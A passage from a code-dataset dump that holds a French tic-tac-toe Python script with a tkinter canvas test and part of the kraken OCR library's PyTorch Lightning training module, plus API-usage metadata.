"logging.DEBUG", "line_number": 170, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 172, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 173, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 180, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 185, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 190, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 190, "usage_type": "name"}, {"api_name": "os.path.isabs", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path", "line_number": 200, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path", "line_number": 208, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 212, "usage_type": "call"}, {"api_name": "os.path", "line_number": 212, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 214, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 223, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 224, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 239, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 242, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 243, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 266, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 286, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 301, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 303, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 305, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 307, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 307, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 309, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 309, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 311, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 313, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 315, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 317, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 319, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 321, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 323, "usage_type": "attribute"}, {"api_name": "logging.Formatter.format", "line_number": 327, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 327, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 341, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 341, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 341, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 342, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 342, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 342, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 343, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 343, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 343, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 375, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 376, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 377, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 378, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 379, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 380, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 375, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 375, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 376, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 376, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 377, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 377, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 378, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 378, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 379, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 379, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 380, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 380, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 380, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 383, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 384, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 385, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 386, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 387, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 388, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 389, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 390, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 391, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 392, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 393, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 394, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 395, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 383, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 383, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 384, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 384, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 385, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 385, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 386, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 386, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 387, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 387, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 388, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 388, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 388, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 389, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 389, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 390, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 390, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 391, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 391, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 392, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 392, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 398, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 399, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 404, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 405, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 406, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 407, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 408, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 409, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 410, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 411, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 415, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 416, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 417, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 418, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 419, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 420, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 421, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 422, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 426, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 429, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 432, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 435, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 438, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 441, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 444, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 447, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 450, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 453, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 479, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 481, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 483, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 495, "usage_type": "call"}, {"api_name": "logging.PLAIN", "line_number": 496, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 502, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 508, "usage_type": "attribute"}, {"api_name": "logging.setLoggerClass", "line_number": 513, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 526, "usage_type": "call"}]}
+{"seq_id": "380884730", "text": "'''\nDocumentation, License etc.\n\n@package projet_morpion\n'''\n\n# 1ère étape : Ecrire une fonction pour afficher le tableau de jeu. Configurer votre tableau comme une liste, où chaque index 1-9 correspond à un nombre sur un clavier, de sorte que vous obtenez un terrain de 3 par 3.\n\nfrom IPython.display import clear_output\n\ndef affiche_tableau(tableau):\n clear_output()\n print(\"Bienvenue dans le jeu du morpion : \\n\") \n print(' | |')\n print(' ' + tableau[7] + ' | ' + tableau[8] + ' | ' + tableau[9])\n print(' | |')\n print('-----------')\n print(' | |')\n print(' ' + tableau[4] + ' | ' + tableau[5] + ' | ' + tableau[6])\n print(' | |')\n print('-----------')\n print(' | |')\n print(' ' + tableau[1] + ' | ' + tableau[2] + ' | ' + tableau[3])\n print(' | |')\n\naffiche_tableau(['','X','X','X','O',' ','O','X','X','X'])\n\n# **2ème étape : Ecrire une fonction qui demande au joueur quelle marque «X» ou «O» il veut utiliser et lui assigner. Pensez à utiliser une boucle *while* pour demander une réponse au joueur jusqu'à obtenir une réponse correcte.** \n\ndef pion_joueur():\n \n marque = ''\n while not (marque == 'X' or marque == 'O'):\n marque = input('Joueur 1: Est-ce que vous voulez jouer X ou O ? ').upper()\n\n if marque == 'X':\n return ('X', 'O')\n else:\n return ('O', 'X') \n\n\n\n\n\nimport tkinter as Tk\nimport time\n\ndef affiche_canevas_tk() :\n N = 3 \n pas=600/N \n root = Tk.Tk() \n c = Tk.Canvas(root,height=600,width=600) \n listidrec=N*[[]] \n for i in range(N): \n listidrec[i]=N*[-1] \n for i in range(N): \n for j in range(N): \n listidrec[i][j] = c.create_rectangle(pas*i, pas*j, pas*(i+1), pas*(j+1), fill='#00FF00') \n \n c.pack()\n def test():\n for i in range(17,256):\n c.itemconfig(listidrec[1][1],fill='#0000'+hex(i)[2:])\n print(hex(i)[2:])\n time.sleep(0.05) \n root.update()\n \n \n b = Tk.Button(text = 'test', command= test)\n b.pack()\n root.mainloop()\n\n# affiche_canevas_tk()\n", "sub_path": "projet_morpion.py", "file_name": "projet_morpion.py", "file_ext": "py", "file_size_in_byte": 2106, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "IPython.display.clear_output", "line_number": 12, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 51, "usage_type": "call"}, {"api_name": "tkinter.Canvas", "line_number": 52, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "504846289", "text": "#\n# Copyright 2015 Benjamin Kiessling\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\"\"\"\nTraining loop interception helpers\n\"\"\"\nimport re\nimport torch\nimport pathlib\nimport logging\nimport warnings\nimport numpy as np\nimport torch.nn.functional as F\nimport pytorch_lightning as pl\n\nfrom functools import partial\nfrom torch.multiprocessing import Pool\nfrom torch.optim import lr_scheduler\nfrom typing import Callable, Dict, Optional, Sequence, Union, Any, List\nfrom pytorch_lightning.callbacks import Callback, EarlyStopping\n\nfrom kraken.lib import models, vgsl, default_specs, progress\nfrom kraken.lib.xml import preparse_xml_data\nfrom kraken.lib.util import make_printable\nfrom kraken.lib.codec import PytorchCodec\nfrom kraken.lib.dataset import (ArrowIPCRecognitionDataset, BaselineSet,\n GroundTruthDataset, PolygonGTDataset,\n ImageInputTransforms, compute_error,\n collate_sequences)\nfrom kraken.lib.models import validate_hyper_parameters\nfrom kraken.lib.exceptions import KrakenInputException, KrakenEncodeException\n\nfrom torch.utils.data import DataLoader, random_split, Subset\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _star_fun(fun, kwargs):\n try:\n return fun(**kwargs)\n except FileNotFoundError as e:\n logger.warning(f'{e.strerror}: {e.filename}. Skipping.')\n except KrakenInputException as e:\n logger.warning(str(e))\n return None\n\n\nclass KrakenTrainer(pl.Trainer):\n def __init__(self,\n enable_progress_bar: bool = True,\n enable_summary: bool = True,\n min_epochs: int = 5,\n max_epochs: int = 100,\n pb_ignored_metrics: Sequence[str] = ('loss', 'val_metric'),\n move_metrics_to_cpu: bool = True,\n *args,\n **kwargs):\n kwargs['logger'] = False\n kwargs['enable_checkpointing'] = False\n kwargs['enable_progress_bar'] = enable_progress_bar\n kwargs['min_epochs'] = min_epochs\n kwargs['max_epochs'] = max_epochs\n kwargs['callbacks'] = ([] if 'callbacks' not in kwargs else kwargs['callbacks'])\n kwargs['move_metrics_to_cpu'] = move_metrics_to_cpu\n if not isinstance(kwargs['callbacks'], list):\n kwargs['callbacks'] = [kwargs['callbacks']]\n\n if enable_progress_bar:\n progress_bar_cb = progress.KrakenTrainProgressBar(ignored_metrics=pb_ignored_metrics)\n kwargs['callbacks'].append(progress_bar_cb)\n\n if enable_summary:\n from pytorch_lightning.callbacks import RichModelSummary\n summary_cb = RichModelSummary(max_depth=2)\n kwargs['callbacks'].append(summary_cb)\n kwargs['enable_model_summary'] = False\n\n kwargs['callbacks'].extend([KrakenSetOneChannelMode(), KrakenSaveModel()])\n super().__init__(*args, **kwargs)\n\n def fit(self, *args, **kwargs):\n with warnings.catch_warnings():\n warnings.filterwarnings(action='ignore', category=UserWarning,\n message='The dataloader,')\n super().fit(*args, **kwargs)\n\n\nclass KrakenSetOneChannelMode(Callback):\n \"\"\"\n Callback that sets the one_channel_mode of the model after the first epoch.\n \"\"\"\n def on_train_epoch_end(self, trainer: \"pl.Trainer\", pl_module: \"pl.LightningModule\") -> None:\n # fill one_channel_mode after 1 iteration over training data set\n if not trainer.sanity_checking and trainer.current_epoch == 0 and trainer.model.nn.model_type == 'recognition':\n ds = getattr(pl_module, 'train_set', None)\n if not ds and trainer.datamodule:\n ds = trainer.datamodule.train_set\n im_mode = ds.dataset.im_mode\n if im_mode in ['1', 'L']:\n logger.info(f'Setting model one_channel_mode to {im_mode}.')\n trainer.model.nn.one_channel_mode = im_mode\n\n\nclass KrakenSaveModel(Callback):\n \"\"\"\n Kraken's own serialization callback instead of pytorch's.\n \"\"\"\n def on_validation_end(self, trainer: \"pl.Trainer\", pl_module: \"pl.LightningModule\") -> None:\n if not trainer.sanity_checking:\n trainer.model.nn.hyper_params['completed_epochs'] += 1\n metric = float(trainer.logged_metrics['val_metric']) if 'val_metric' in trainer.logged_metrics else -1.0\n trainer.model.nn.user_metadata['accuracy'].append((trainer.global_step, metric))\n trainer.model.nn.user_metadata['metrics'].append((trainer.global_step, {k: float(v) for k, v in trainer.logged_metrics.items()}))\n\n logger.info('Saving to {}_{}'.format(trainer.model.output, trainer.current_epoch))\n trainer.model.nn.save_model(f'{trainer.model.output}_{trainer.current_epoch}.mlmodel')\n\n\nclass RecognitionModel(pl.LightningModule):\n def __init__(self,\n hyper_params: Dict[str, Any] = None,\n output: str = 'model',\n spec: str = default_specs.RECOGNITION_SPEC,\n append: Optional[int] = None,\n model: Optional[Union[pathlib.Path, str]] = None,\n reorder: Union[bool, str] = True,\n training_data: Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]] = None,\n evaluation_data: Optional[Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]]] = None,\n partition: Optional[float] = 0.9,\n binary_dataset_split: bool = False,\n num_workers: int = 1,\n load_hyper_parameters: bool = False,\n repolygonize: bool = False,\n force_binarization: bool = False,\n format_type: str = 'path',\n codec: Optional[Dict] = None,\n resize: str = 'fail'):\n \"\"\"\n A LightningModule encapsulating the training setup for a text\n recognition model.\n\n Setup parameters (load, training_data, evaluation_data, ....) are\n named, model hyperparameters (everything in\n `kraken.lib.default_specs.RECOGNITION_HYPER_PARAMS`) are in in the\n `hyper_params` argument.\n\n Args:\n hyper_params (dict): Hyperparameter dictionary containing all fields\n from\n kraken.lib.default_specs.RECOGNITION_HYPER_PARAMS\n **kwargs: Setup parameters, i.e. CLI parameters of the train() command.\n \"\"\"\n super().__init__()\n hyper_params_ = default_specs.RECOGNITION_HYPER_PARAMS\n if model:\n logger.info(f'Loading existing model from {model} ')\n self.nn = vgsl.TorchVGSLModel.load_model(model)\n\n if self.nn.model_type not in [None, 'recognition']:\n raise ValueError(f'Model {model} is of type {self.nn.model_type} while `recognition` is expected.')\n\n if load_hyper_parameters:\n hp = self.nn.hyper_params\n else:\n hp = {}\n hyper_params_.update(hp)\n else:\n self.nn = None\n\n if hyper_params:\n hyper_params_.update(hyper_params)\n self.save_hyperparameters(hyper_params_)\n\n self.reorder = reorder\n self.append = append\n self.model = model\n self.num_workers = num_workers\n self.resize = resize\n self.format_type = format_type\n self.output = output\n\n self.best_epoch = 0\n self.best_metric = 0.0\n\n DatasetClass = GroundTruthDataset\n valid_norm = True\n if format_type in ['xml', 'page', 'alto']:\n logger.info(f'Parsing {len(training_data)} XML files for training data')\n training_data = preparse_xml_data(training_data, format_type, repolygonize)\n if evaluation_data:\n logger.info(f'Parsing {len(evaluation_data)} XML files for validation data')\n evaluation_data = preparse_xml_data(evaluation_data, format_type, repolygonize)\n if binary_dataset_split:\n logger.warning('Internal binary dataset splits are enabled but using non-binary dataset files. Will be ignored.')\n binary_dataset_split = False\n DatasetClass = PolygonGTDataset\n valid_norm = False\n elif format_type == 'binary':\n DatasetClass = ArrowIPCRecognitionDataset\n if repolygonize:\n logger.warning('Repolygonization enabled in `binary` mode. Will be ignored.')\n valid_norm = False\n logger.info(f'Got {len(training_data)} binary dataset files for training data')\n training_data = [{'file': file} for file in training_data]\n if evaluation_data:\n logger.info(f'Got {len(evaluation_data)} binary dataset files for validation data')\n evaluation_data = [{'file': file} for file in evaluation_data]\n elif format_type == 'path':\n if force_binarization:\n logger.warning('Forced binarization enabled in `path` mode. Will be ignored.')\n force_binarization = False\n if repolygonize:\n logger.warning('Repolygonization enabled in `path` mode. Will be ignored.')\n if binary_dataset_split:\n logger.warning('Internal binary dataset splits are enabled but using non-binary dataset files. Will be ignored.')\n binary_dataset_split = False\n logger.info(f'Got {len(training_data)} line strip images for training data')\n training_data = [{'image': im} for im in training_data]\n if evaluation_data:\n logger.info(f'Got {len(evaluation_data)} line strip images for validation data')\n evaluation_data = [{'image': im} for im in evaluation_data]\n valid_norm = True\n # format_type is None. Determine training type from length of training data entry\n elif not format_type:\n if len(training_data[0]) >= 4:\n DatasetClass = PolygonGTDataset\n valid_norm = False\n else:\n if force_binarization:\n logger.warning('Forced binarization enabled with box lines. Will be ignored.')\n force_binarization = False\n if repolygonize:\n logger.warning('Repolygonization enabled with box lines. Will be ignored.')\n if binary_dataset_split:\n logger.warning('Internal binary dataset splits are enabled but using non-binary dataset files. Will be ignored.')\n binary_dataset_split = False\n else:\n raise ValueError(f'format_type {format_type} not in [alto, page, xml, path, binary].')\n\n spec = spec.strip()\n if spec[0] != '[' or spec[-1] != ']':\n raise ValueError(f'VGSL spec {spec} not bracketed')\n self.spec = spec\n # preparse input sizes from vgsl string to seed ground truth data set\n # sizes and dimension ordering.\n if not self.nn:\n blocks = spec[1:-1].split(' ')\n m = re.match(r'(\\d+),(\\d+),(\\d+),(\\d+)', blocks[0])\n if not m:\n raise ValueError(f'Invalid input spec {blocks[0]}')\n batch, height, width, channels = [int(x) for x in m.groups()]\n else:\n batch, channels, height, width = self.nn.input\n\n self.transforms = ImageInputTransforms(batch,\n height,\n width,\n channels,\n self.hparams.pad,\n valid_norm,\n force_binarization)\n\n self.example_input_array = torch.Tensor(batch,\n channels,\n height if height else 32,\n width if width else 400)\n\n if 'file_system' in torch.multiprocessing.get_all_sharing_strategies():\n logger.debug('Setting multiprocessing tensor sharing strategy to file_system')\n torch.multiprocessing.set_sharing_strategy('file_system')\n\n if evaluation_data:\n train_set = self._build_dataset(DatasetClass, training_data)\n self.train_set = Subset(train_set, range(len(train_set)))\n val_set = self._build_dataset(DatasetClass, evaluation_data)\n self.val_set = Subset(val_set, range(len(val_set)))\n elif binary_dataset_split:\n train_set = self._build_dataset(DatasetClass, training_data, split_filter='train')\n self.train_set = Subset(train_set, range(len(train_set)))\n val_set = self._build_dataset(DatasetClass, training_data, split_filter='validation')\n self.val_set = Subset(val_set, range(len(val_set)))\n logger.info(f'Found {len(self.train_set)} (train) / {len(self.val_set)} (val) samples in pre-encoded dataset')\n else:\n train_set = self._build_dataset(DatasetClass, training_data)\n train_len = int(len(train_set)*partition)\n val_len = len(train_set) - train_len\n logger.info(f'No explicit validation data provided. Splitting off '\n f'{val_len} (of {len(train_set)}) samples to validation '\n 'set. (Will disable alphabet mismatch detection.)')\n self.train_set, self.val_set = random_split(train_set, (train_len, val_len))\n\n if len(self.train_set) == 0 or len(self.val_set) == 0:\n raise ValueError('No valid training data was provided to the train '\n 'command. Please add valid XML, line, or binary data.')\n\n logger.info(f'Training set {len(self.train_set)} lines, validation set '\n f'{len(self.val_set)} lines, alphabet {len(train_set.alphabet)} '\n 'symbols')\n alpha_diff_only_train = set(self.train_set.dataset.alphabet).difference(set(self.val_set.dataset.alphabet))\n alpha_diff_only_val = set(self.val_set.dataset.alphabet).difference(set(self.train_set.dataset.alphabet))\n if alpha_diff_only_train:\n logger.warning(f'alphabet mismatch: chars in training set only: '\n f'{alpha_diff_only_train} (not included in accuracy test '\n 'during training)')\n if alpha_diff_only_val:\n logger.warning(f'alphabet mismatch: chars in validation set only: {alpha_diff_only_val} (not trained)')\n logger.info('grapheme\\tcount')\n for k, v in sorted(train_set.alphabet.items(), key=lambda x: x[1], reverse=True):\n char = make_printable(k)\n if char == k:\n char = '\\t' + char\n logger.info(f'{char}\\t{v}')\n\n if codec:\n logger.info('Instantiating codec')\n self.codec = PytorchCodec(codec)\n for k, v in self.codec.c2l.items():\n char = make_printable(k)\n if char == k:\n char = '\\t' + char\n logger.info(f'{char}\\t{v}')\n else:\n self.codec = None\n\n logger.info('Encoding training set')\n\n def _build_dataset(self,\n DatasetClass,\n training_data,\n **kwargs):\n dataset = DatasetClass(normalization=self.hparams.normalization,\n whitespace_normalization=self.hparams.normalize_whitespace,\n reorder=self.reorder,\n im_transforms=self.transforms,\n augmentation=self.hparams.augment,\n **kwargs)\n\n if (self.num_workers and self.num_workers > 1) and self.format_type != 'binary':\n with Pool(processes=self.num_workers) as pool:\n for im in pool.imap_unordered(partial(_star_fun, dataset.parse), training_data, 5):\n logger.debug(f'Adding sample {im} to training set')\n if im:\n dataset.add(**im)\n else:\n for im in training_data:\n try:\n dataset.add(**im)\n except KrakenInputException as e:\n logger.warning(str(e))\n if self.format_type == 'binary' and self.hparams.normalization:\n logger.debug('Rebuilding dataset using unicode normalization')\n dataset.rebuild_alphabet()\n return dataset\n\n def forward(self, x, seq_lens=None):\n return self.net(x, seq_lens)\n\n def training_step(self, batch, batch_idx):\n input, target = batch['image'], batch['target']\n # sequence batch\n if 'seq_lens' in batch:\n seq_lens, label_lens = batch['seq_lens'], batch['target_lens']\n target = (target, label_lens)\n o = self.net(input, seq_lens)\n else:\n o = self.net(input)\n\n seq_lens = o[1]\n output = o[0]\n target_lens = target[1]\n target = target[0]\n # height should be 1 by now\n if output.size(2) != 1:\n raise KrakenInputException('Expected dimension 3 to be 1, actual {}'.format(output.size(2)))\n output = output.squeeze(2)\n # NCW -> WNC\n loss = self.nn.criterion(output.permute(2, 0, 1), # type: ignore\n target,\n seq_lens,\n target_lens)\n return loss\n\n def validation_step(self, batch, batch_idx):\n chars, error = compute_error(self.rec_nn, batch)\n chars = torch.tensor(chars)\n error = torch.tensor(error)\n return {'chars': chars, 'error': error}\n\n def validation_epoch_end(self, outputs):\n chars = torch.stack([x['chars'] for x in outputs]).sum()\n error = torch.stack([x['error'] for x in outputs]).sum()\n accuracy = (chars - error) / (chars + torch.finfo(torch.float).eps)\n if accuracy > self.best_metric:\n logger.debug(f'Updating best metric from {self.best_metric} ({self.best_epoch}) to {accuracy} ({self.current_epoch})')\n self.best_epoch = self.current_epoch\n self.best_metric = accuracy\n logger.info(f'validation run: total chars {chars} errors {error} accuracy {accuracy}')\n self.log_dict({'val_accuracy': accuracy, 'val_metric': accuracy}, prog_bar=True)\n\n def setup(self, stage: Optional[str] = None):\n # finalize models in case of appending/loading\n if stage in [None, 'fit']:\n if self.append:\n self.train_set.dataset.encode(self.codec)\n # now we can create a new model\n self.spec = '[{} O1c{}]'.format(self.spec[1:-1], self.train_set.dataset.codec.max_label + 1)\n logger.info(f'Appending {self.spec} to existing model {self.nn.spec} after {self.append}')\n self.nn.append(self.append, self.spec)\n self.nn.add_codec(self.train_set.dataset.codec)\n logger.info(f'Assembled model spec: {self.nn.spec}')\n elif self.model:\n self.spec = self.nn.spec\n\n # prefer explicitly given codec over network codec if mode is 'both'\n codec = self.codec if (self.codec and self.resize == 'both') else self.nn.codec\n\n codec.strict = True\n\n try:\n self.train_set.dataset.encode(codec)\n except KrakenEncodeException:\n alpha_diff = set(self.train_set.dataset.alphabet).difference(\n set(codec.c2l.keys())\n )\n alpha_diff_val = set(self.val_set.dataset.alphabet).difference(\n set(codec.c2l.keys())\n )\n if self.resize == 'fail':\n raise KrakenInputException(f'Training data and model codec alphabets mismatch: {alpha_diff}')\n elif self.resize == 'add':\n logger.info(f'Resizing codec to include '\n f'{len(alpha_diff.union(alpha_diff_val))} new code points')\n # Add the characters in val only\n codec = codec.add_labels(alpha_diff.union(alpha_diff_val))\n self.nn.add_codec(codec)\n logger.info(f'Resizing last layer in network to {codec.max_label+1} outputs')\n self.nn.resize_output(codec.max_label + 1)\n self.train_set.dataset.encode(self.nn.codec)\n elif self.resize == 'both':\n logger.info(f'Resizing network or given codec to '\n f'{len(self.train_set.dataset.alphabet)+len(self.val_set.dataset.alphabet)} '\n f'code sequences')\n self.train_set.dataset.encode(None)\n ncodec, del_labels = codec.merge(self.train_set.dataset.codec)\n # Add the characters in val only\n val_diff = set(self.val_set.dataset.alphabet).difference(\n set(ncodec.c2l.keys())\n )\n ncodec.add_labels(val_diff)\n # Switch codec.\n self.nn.add_codec(ncodec)\n logger.info(f'Deleting {len(del_labels)} output classes from network '\n f'({len(codec)-len(del_labels)} retained)')\n self.train_set.dataset.encode(ncodec)\n self.nn.resize_output(ncodec.max_label + 1, del_labels)\n else:\n raise ValueError(f'invalid resize parameter value {self.resize}')\n\n self.nn.codec.strict = False\n\n else:\n self.train_set.dataset.encode(self.codec)\n logger.info(f'Creating new model {self.spec} with {self.train_set.dataset.codec.max_label+1} outputs')\n self.spec = '[{} O1c{}]'.format(self.spec[1:-1], self.train_set.dataset.codec.max_label + 1)\n self.nn = vgsl.TorchVGSLModel(self.spec)\n # initialize weights\n self.nn.init_weights()\n self.nn.add_codec(self.train_set.dataset.codec)\n\n self.val_set.dataset.encode(self.nn.codec)\n\n if self.nn.one_channel_mode and self.train_set.dataset.im_mode != self.nn.one_channel_mode:\n logger.warning(f'Neural network has been trained on mode {self.nn.one_channel_mode} images, '\n f'training set contains mode 